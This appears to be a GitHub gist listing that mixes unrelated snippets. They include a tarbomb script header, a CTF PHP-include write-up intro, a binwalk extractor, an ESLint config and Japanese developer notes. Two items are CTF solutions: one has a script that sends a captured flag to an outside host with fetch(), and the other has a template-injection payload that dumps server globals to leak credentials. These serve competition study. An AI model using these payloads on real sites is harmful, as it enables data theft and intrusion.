Lorse LorseKudos

View GitHub Profile
#!/bin/python
# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
# Copyright 2020 Andrew Scott
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the PHP installation to make sure that previously known solutions wouldn't work (for further information, read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@00xc
00xc / binwalk-extract.py
Last active April 15, 2025 07:30
Extracting every embedded file with binwalk
#!/usr/bin/env python3
import sys
import os
import binwalk
import shlex
import subprocess as sp

def dump_file(file, offset, size, outfile):
    # Carve the region starting at `offset` out of `file` into `outfile` with dd.
    # The size argument was previously passed to format() but never used.
    cmd = "dd if={} of={} bs=1 skip={}".format(shlex.quote(file), shlex.quote(outfile), offset)
    if size is not None:
        # When binwalk reports a size, limit the copy to that many bytes.
        cmd += " count={}".format(size)
    sp.run(shlex.split(cmd), check=True)
@jorgectf
jorgectf / DragonSector_2020_Scratchpad.md
Last active November 22, 2021 18:24
Solution for DragonSector 2020 CTF's ScratchPad challenge.
@icchy
icchy / q.html
Last active April 26, 2023 22:01
Pwn2Win 2020 matrona v2
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<script>
window.addEventListener('hashchange', (evt) => {
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>
@stypr
stypr / dogooos.md
Last active June 15, 2020 11:35
DEFCON Quals Web exploit (Participated as r3kapig)

SSTI

  1. Write one comment
  2. When writing the comment content, use SSTI to leak the author's credentials
{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 
@shun-shobon
shun-shobon / .eslintrc
Last active November 22, 2020 14:43
Example TypeScript + ESLint + Prettier environment setup
{
  "env": {
    "node": true,
    "es2021": true
  },
  "plugins": ["@typescript-eslint"],
  "parser": "@typescript-eslint/parser",
  "parserOptions": {
    "sourceType": "module"
  },
@mpppk
mpppk / clean_architecture.md
Last active April 22, 2025 09:58
Clean Architecture, Fully Understood

Addendum 2020/5/31: I intended this as a memo for myself, but I'm very happy to have received so many stars.
At the same time, I feel bad that you are seeing a half-written, unfinished document.

To complete this document, I plan the following updates:

  • Fill in the TODO sections
  • Split the theory/principles part (based on the book) from the implementation examples part
    • Currently the structure for each of the four layers is: review the principles → list of implementation issues → implementation example, but this scattered the references to the same repository. After the update, the plan is to first enumerate all implementation issues and then review the implementation together.

Addendum 2021/1/22:

Fighting ISUCON with Go

mercari.go #4 https://mercari.connpass.com/event/105640/

About me

  • I'm active on various social networks under the ID catatsuy
    • People call me "katatsui"
  • I mainly write Go on the SRE team at Mercari
  • At my previous job at pixiv I did a variety of things, including migrating pixiv to HTTPS, PHP 7.1 and HTTP/2, and adding new features to the ad server